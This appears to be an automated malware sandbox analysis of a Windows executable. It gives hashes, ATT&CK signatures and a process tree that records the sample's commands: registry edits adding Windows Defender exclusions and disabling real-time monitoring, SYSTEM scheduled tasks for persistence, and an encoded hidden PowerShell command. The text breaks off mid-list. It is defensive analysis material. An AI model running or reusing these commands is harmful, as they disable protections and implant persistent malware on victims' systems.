30acf4d611e61ade6420361f25b8a03c6b89d4f32d3526dd56ba332ff4d72675

Analysis

max time kernel
1s
max time network
115s
platform
windows7_x64
resource
win7-20231130-en
resource tags

arch:x64arch:x86image:win7-20231130-enlocale:en-usos:windows7-x64system
submitted
10/12/2023, 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

9fc04d82e8ac9fb4fb37871f06c2ccf7
SHA1

d6cfbb968f0583f732c2f72b6a93920d00f64756
SHA256

30acf4d611e61ade6420361f25b8a03c6b89d4f32d3526dd56ba332ff4d72675
SHA512

b8514c4a9dcb66c5dc73054b96772e25cbf791df2801c5a2f44f86d590f17dcbf004a8d161fcdb566340a123d373e0bbc11d3699be89a5d7042cc53adbe3fc96
SSDEEP

196608:91O6Mz/dMxe8tPdkwsn/oo+AN9D1yxuModM9ePB1dgBkMPBst:3O6Mz/Ge8tPz0ZNOxuDdM90qtPet

Score

7^/10

Malware Config

Signatures

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Executes dropped EXE 2 IoCs

pid	Process
3052	Install.exe
2848	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
2224	file.exe
3052	Install.exe
3052	Install.exe
3052	Install.exe
3052	Install.exe
2848	Install.exe
2848	Install.exe
2848	Install.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
976	schtasks.exe
1832	schtasks.exe
2924	schtasks.exe
1108	schtasks.exe
2632	schtasks.exe
1840	schtasks.exe
2700	schtasks.exe
2112	schtasks.exe
1900	schtasks.exe
2020	schtasks.exe
2472	schtasks.exe
976	schtasks.exe
2588	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2224 wrote to memory of 3052	2224	file.exe	28
PID 2224 wrote to memory of 3052	2224	file.exe	28
PID 2224 wrote to memory of 3052	2224	file.exe	28
PID 2224 wrote to memory of 3052	2224	file.exe	28
PID 2224 wrote to memory of 3052	2224	file.exe	28
PID 2224 wrote to memory of 3052	2224	file.exe	28
PID 2224 wrote to memory of 3052	2224	file.exe	28
PID 3052 wrote to memory of 2848	3052	Install.exe	29
PID 3052 wrote to memory of 2848	3052	Install.exe	29
PID 3052 wrote to memory of 2848	3052	Install.exe	29
PID 3052 wrote to memory of 2848	3052	Install.exe	29
PID 3052 wrote to memory of 2848	3052	Install.exe	29
PID 3052 wrote to memory of 2848	3052	Install.exe	29
PID 3052 wrote to memory of 2848	3052	Install.exe	29

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2224
- C:\Users\Admin\AppData\Local\Temp\7zS10C3.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Users\Admin\AppData\Local\Temp\7zS1287.tmp\Install.exe
    .\Install.exe /ididpfN "525403" /S
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates system info in registry
    PID:2848
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      PID:2468
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        
        PID:2496
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:2488
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:2596
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      PID:2620
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        
        PID:2652
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:2720
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:2792
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gAqBqeohc" /SC once /ST 01:40:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:2472
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gAqBqeohc"
      4⤵
      PID:2536
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hGpBXDjxpfKlklFG" /t REG_DWORD /d 0 /reg:32
        5⤵
        
        PID:2636
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gAqBqeohc"
      4⤵
      PID:1952
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bjCuWBCpJDbYOtqoiT" /SC once /ST 22:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RoWDibJBbeeKNsBdP\EoKbSLzsMWwSBsc\ViRNhYg.exe\" 5J /Iosite_ideeo 525403 /S" /V1 /F
      4⤵
      Creates scheduled task(s)
      PID:2700

C:\Windows\system32\taskeng.exe
taskeng.exe {F39826FB-40B9-470E-BFFB-2596F2ABAE46} S-1-5-21-2185821622-4133679102-1697169727-1000:QHCIVBOB\Admin:Interactive:[1]
1⤵
PID:2800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:2152
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:576
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:2096
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:2496
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1232

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2716

C:\Windows\system32\taskeng.exe
taskeng.exe {915FFABA-63F3-4D26-9351-86EE10D76560} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:608
- C:\Users\Admin\AppData\Local\Temp\RoWDibJBbeeKNsBdP\EoKbSLzsMWwSBsc\ViRNhYg.exe
  C:\Users\Admin\AppData\Local\Temp\RoWDibJBbeeKNsBdP\EoKbSLzsMWwSBsc\ViRNhYg.exe 5J /Iosite_ideeo 525403 /S
  2⤵
  PID:2280
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gWMkzuLPY" /SC once /ST 01:38:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:976
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gWMkzuLPY"
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gWMkzuLPY"
    3⤵
    PID:1128
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gImaKFrBi"
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gImaKFrBi" /SC once /ST 10:04:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2112
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gImaKFrBi"
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hGpBXDjxpfKlklFG" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2892
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hGpBXDjxpfKlklFG" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1980
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hGpBXDjxpfKlklFG" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2964
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\hGpBXDjxpfKlklFG\NlSxktDe\zrNNceMIBSJrqtKl.wsf"
    3⤵
    PID:1992
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AmhzsxaVU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1068
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JgjwnTaEBfjU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AmhzsxaVU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1564
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hGpBXDjxpfKlklFG" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1616
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hGpBXDjxpfKlklFG" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1712
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RoWDibJBbeeKNsBdP" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2624
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RoWDibJBbeeKNsBdP" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2748
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:968
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3004
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kIhLjzdanwqjfbVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2884
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kIhLjzdanwqjfbVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1788
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pHExoiVQknUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2856
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pHExoiVQknUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:924
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\buGBAmmhzfStC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:816
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\buGBAmmhzfStC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1224
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGxeKYIsRGcWkICfFvR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1428
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGxeKYIsRGcWkICfFvR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1320
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JgjwnTaEBfjU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:540
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AmhzsxaVU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1832
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hGpBXDjxpfKlklFG" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3056
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AmhzsxaVU\VcTjvW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "CFxKYoFgBuACXAH" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:1900
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
        5⤵
        
        PID:576
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
        5⤵
        
        PID:824
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "bjCuWBCpJDbYOtqoiT"
        5⤵
        
        PID:720
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hGpBXDjxpfKlklFG" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1520
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RoWDibJBbeeKNsBdP" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:976
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RoWDibJBbeeKNsBdP" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:652
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1292
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2780
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kIhLjzdanwqjfbVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2784
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kIhLjzdanwqjfbVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2920
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pHExoiVQknUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2700
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pHExoiVQknUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1944
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\buGBAmmhzfStC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2132
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\buGBAmmhzfStC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2548
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGxeKYIsRGcWkICfFvR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2016
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGxeKYIsRGcWkICfFvR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2324
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JgjwnTaEBfjU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1724
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JgjwnTaEBfjU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2020
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AmhzsxaVU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1960
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gbtuDNPTK"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gbtuDNPTK" /SC once /ST 16:47:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\hGpBXDjxpfKlklFG\NlSxktDe\zrNNceMIBSJrqtKl.wsf"
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hGpBXDjxpfKlklFG" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2536
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hGpBXDjxpfKlklFG" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:1292
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      4⤵
      PID:1472
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "sNguNtCPOrkOrNARW"
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "sNguNtCPOrkOrNARW" /SC once /ST 05:08:47 /RU "SYSTEM" /TR "\"C:\Windows\Temp\hGpBXDjxpfKlklFG\bmYsZhtxNezTCwb\MFbBMFm.exe\" j7 /aRsite_idLUV 525403 /S" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:976
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:348
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gbtuDNPTK"
    3⤵
    PID:1704
- C:\Windows\Temp\hGpBXDjxpfKlklFG\bmYsZhtxNezTCwb\MFbBMFm.exe
  C:\Windows\Temp\hGpBXDjxpfKlklFG\bmYsZhtxNezTCwb\MFbBMFm.exe j7 /aRsite_idLUV 525403 /S
  2⤵
  PID:3056
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "CFxKYoFgBuACXAH"
    3⤵
    PID:824
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "eJVTQNbXRYnUF2" /F /xml "C:\ProgramData\kIhLjzdanwqjfbVB\ElPTvEE.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:1108
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "zoTPxNSHOcUmXnjXJ2" /F /xml "C:\Program Files (x86)\TGxeKYIsRGcWkICfFvR\PSTRTow.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:2588
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "IsvIrSvrYSMixBPuBnx2" /F /xml "C:\Program Files (x86)\buGBAmmhzfStC\JFMNudv.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:2632
- - C:\Windows\SysWOW64\schtasks.exe
